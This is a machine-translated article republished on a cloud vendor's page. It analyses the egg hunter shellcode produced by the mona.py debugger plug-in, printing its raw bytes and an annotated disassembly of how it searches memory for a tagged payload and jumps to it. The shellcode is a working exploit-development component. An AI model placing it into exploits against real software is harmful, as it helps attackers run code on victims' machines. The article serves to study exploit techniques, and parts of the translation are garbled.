Home > Cloud Computing > Cloud Security

Analysis of the egg hunter method of mona. py

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

 

Mona is a plug-in for Immunity Debugger. It has powerful functions and can help exploit programmers quickly find the desired command sequence and many useful Memory search functions. The egg hunter code generation function is available. The default generation result is as follows:

 

========================================================== ==========================================================

Output generated by mona. py v1.1

Corelan Team-http://www.corelan.be

========================================================== ==========================================================

OS: xp, release 5.1.2600

Process being debugged: php (pid 15016)

========================================================== ==========================================================

22:20:41

========================================================== ==========================================================

Egghunter, tag w00t:

"\ X66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74"

"\ Xef \ xb8 \ x77 \ x30 \ x30 \ x74 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7"

Put this tag in front of your shellcode: w00tw00t

After debugging this command sequence in OD, you can sort out the following code:

 

00406030 66: 81CA FF0F or dx, 0FFF; generate an initial value of edx

00406035 42 inc edx; move EDX --- code

00406036 52 push edx; save EDX to the stack

00406037 6A 02 PUSH 2;

00406039 58 pop eax; send 2 to eax, which is the system call number

0040603A CD 2E INT 2E;

0040603C 3C 05 cmp al, 5; the system calls INT 2E and compares whether AL is 5. Note that if the value in EDX is not writable, EAX = C0000005 or C00000C5

0040603E 5A pop edx; restore the EDX Value

0040603F ^ 74 ef je short shellcod.00406030; if [EDX] cannot be written, jump to code

00406041 B8 77303074 mov eax, 74303077

00406046 8BFA mov edi, EDX

00406048 af scas dword ptr es: [EDI]; check whether the memory pointed by EDI is EAX Value

00406049 ^ 75 ea jnz short shellcod.00406035;

0040604B af scas dword ptr es: [EDI]; if you continue to judge whether the directed memory is EAX value (note that 4 is added to EDI after SCAS)

0040604C ^ 75 E7 jnz short shellcod.00406035; if not, jump to code

0040604E FFE7 jmp edi; find egg, jump to the found code and execute

 

From painful beliefs

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
signature of method function of method method of sending email analysis of algorithms book piece of string character analysis of following example of method error swot analysis of ice cream
Related Article
Focus on three major cloud security areas, you know?
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More